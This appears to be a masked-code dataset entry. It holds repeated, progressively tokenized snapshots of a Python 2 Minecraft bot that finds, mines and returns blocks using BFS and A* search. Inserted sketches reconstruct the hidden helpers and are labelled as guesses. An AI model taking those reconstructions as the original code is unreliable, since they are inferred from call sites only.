<function token>
<function token>
<function token>
<function token>
<function token>
<function token>
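The snapshot above is the most complete one left in this entry, so a usage sketch fits here. It assumes a running mcpi-compatible server (Minecraft: Pi Edition or a RaspberryJuice-style plugin) and that the reconstructed script is importable as bot.py; the module name and the 'DIRT' argument are illustrative assumptions, not part of the dataset.

# Hypothetical usage sketch -- not one of the original dataset entries.
# Assumes the script above is saved as bot.py and a server is running.
from bot import Bot

robot = Bot()            # spawns the two-block iron bot next to the player
try:
    robot.fetch('DIRT')  # any attribute name from mcpi.block, e.g. 'STONE'
finally:
    robot.destroy()      # always clean up the iron blocks
    Bot.destroy_all()    # sweep up strays left by earlier crashed runs

Wrapping the fetch in try/finally matters because fetch raises if no path exists, and a dead bot would otherwise leave two iron blocks in the world.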
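fetch calls astar(mine_prob, _mine_heuristic) and astar(return_prob, _return_heuristic), but both heuristics are collapsed to <function token> in every snapshot. A plausible stand-in, inferred only from the visible call sites (the bot state exposes get_pos and contains, the problem exposes get_block_loc and get_block_id), is Manhattan distance to the target. This is a hedged sketch, not the elided original.

# Illustrative stand-in only -- the real _mine_heuristic is tokenized away.
def _mine_heuristic_sketch(bot, problem):
    """Lower-bound the number of actions left to reach the block."""
    if bot.contains(problem.get_block_id()):
        return 0  # goal already satisfied
    pos = bot.get_pos()
    block_loc = problem.get_block_loc()
    # Manhattan distance in blocks; every action above costs exactly 1.
    return (abs(pos.x - block_loc.x) + abs(pos.y - block_loc.y) +
            abs(pos.z - block_loc.z))

With unit action costs, Manhattan distance never overestimates the remaining moves, so A* stays optimal under these assumptions.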
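The direction helpers _adj_dirs and _all_dirs are likewise tokenized away, but their behavior is pinned down fairly tightly by the call sites: _adj_dirs feeds the horizontal side moves and block placement, while _all_dirs feeds the 6-connected successor scan in FindProblem. A likely reconstruction, offered as an inference rather than the recovered original:

# Hypothetical reconstructions of the tokenized direction helpers.
def _adj_dirs():
    """Return the four horizontal unit vectors."""
    return [_Vec3(1, 0, 0), _Vec3(-1, 0, 0),
            _Vec3(0, 0, 1), _Vec3(0, 0, -1)]


def _all_dirs():
    """Return the six axis-aligned unit vectors."""
    return _adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]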
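One of the two <class token> placeholders in each snapshot's header stands for _Vec3. The surviving code uses _Vec3 instances as dict keys (_changes), inside a frozenset (__hash__), with a no-argument constructor, and folded by sum() in _get_block_loc, which suggests a hashable Vec3 subclass along these lines. Everything below is inferred from usage, not recovered from the dataset.

# Sketch of the hidden _Vec3 class, assuming mcpi's Vec3 as the base.
from mcpi.vec3 import Vec3


class _Vec3(Vec3):
    """A Vec3 that can live in dicts and frozensets."""

    def __hash__(self):
        # Value-based hash so equal vectors collide as dict keys;
        # assumes Vec3 already defines value-based __eq__.
        return hash((self.x, self.y, self.z))

    def __radd__(self, other):
        # Lets sum(list_of_vecs) fold from its integer 0 start value.
        if other == 0:
            return self
        return self + other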
_all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n\n\nclass _ImaginaryBot(_GenericBot):\n <docstring token>\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. 
block_ is the block id.\"\"\"\n        self._changes[deepcopy(pos)] = block_\n\n    def _get_block(self, pos):\n        \"\"\"Get the block at the position.\"\"\"\n        if pos in self._changes:\n            return self._changes[pos]\n        else:\n            return _get_mc().getBlock(pos)\n\n    def get_block(self, pos):\n        \"\"\"The public version.\"\"\"\n        return self._get_block(pos)\n\n    def __hash__(self):\n        \"\"\"Return the hash.\"\"\"\n        return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n            _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n    \"\"\"The real bot.\n\n    All vector arguments are Vec3s.\"\"\"\n    _BOT_BLOCK = block.IRON_BLOCK.id\n\n    def __init__(self):\n        \"\"\"Create a bot next to the player.\"\"\"\n        pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n        pos = _Vec3(pos.x, pos.y, pos.z)\n        _GenericBot.__init__(self, pos)\n        self._pos = pos\n        self._move(self._pos)\n\n    @staticmethod\n    def destroy_all():\n        \"\"\"Destroy all bots within a small distance (in case I forget to\n        destroy one).\"\"\"\n        player_loc = _player_loc()\n        minec = _get_mc()\n        rad = 10\n        for x in xrange(player_loc.x - rad, player_loc.x + rad):\n            for y in xrange(player_loc.y - rad, player_loc.y + rad):\n                for z in xrange(player_loc.z - rad, player_loc.z + rad):\n                    if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n                        minec.setBlock(x, y, z, _AIR)\n\n    def destroy(self):\n        \"\"\"Set itself to air.\"\"\"\n        self._set_block(self._pos, _AIR)\n        self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n    def fetch(self, block_name):\n        \"\"\"Mine and return a block to the player.\"\"\"\n        imag_bot = _ImaginaryBot(self._pos, self._inventory)\n        block_id = getattr(block, block_name).id\n        block_loc = self._get_block_loc(block_id)\n        mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n        mine_actions = astar(mine_prob, _mine_heuristic)\n        self.take_actions(mine_actions, _DELAY)\n        imag_bot = _ImaginaryBot(self._pos, self._inventory)\n        player_loc = _player_loc()\n        return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n        return_actions = astar(return_prob, _return_heuristic)\n        imag_bot.take_actions(return_actions)\n        return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n            ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n        self.take_actions(return_actions, _DELAY)\n\n    def _get_block_loc(self, block_id):\n        \"\"\"Return the location of the block.\"\"\"\n        find_prob = FindProblem(self._pos, block_id)\n        dirs = bfs(find_prob)\n        return self._pos + sum(dirs)\n\n    def _set_block(self, pos, block_):\n        \"\"\"Place an actual block in the world.\n\n        block is a block id.\"\"\"\n        _get_mc().setBlock(pos, block_)\n\n    def _get_block(self, pos):\n        \"\"\"Get the block at the position.\"\"\"\n        return _get_mc().getBlock(pos)\n\n    def _move(self, pos):\n        \"\"\"Move there, and set the appropriate blocks.\"\"\"\n        self._set_block(self._pos, _AIR)\n        self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n        self._set_block(pos, self._BOT_BLOCK)\n        self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n        self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n    \"\"\"Problem for finding the location of a block in the world.\n\n    A state in this problem is a location.\n    \"\"\"\n\n    def __init__(self, start_loc, block_id):\n        \"\"\"Initialize.\"\"\"\n        self._start_loc = deepcopy(start_loc)\n        self._block_id = block_id\n\n    def getStartState(self):\n        \"\"\"Return the starting location.\"\"\"\n        return self._start_loc\n\n    def isGoalState(self, state):\n        return _get_mc().getBlock(state) == self._block_id\n\n    def getSuccessors(self, state):\n        \"\"\"Return the successors.\"\"\"\n        rtn = []\n        for dir_ in 
_all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n\n\nclass _ImaginaryBot(_GenericBot):\n <docstring token>\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n <function token>\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = 
_Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return 
self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n\n\nclass _ImaginaryBot(_GenericBot):\n <docstring token>\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n <function token>\n <function token>\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = 
self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. 
This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n\n\nclass _ImaginaryBot(_GenericBot):\n <docstring token>\n <function token>\n <function token>\n <function token>\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = 
FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. 
This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n\n\nclass _ImaginaryBot(_GenericBot):\n <docstring token>\n <function token>\n <function token>\n <function token>\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n 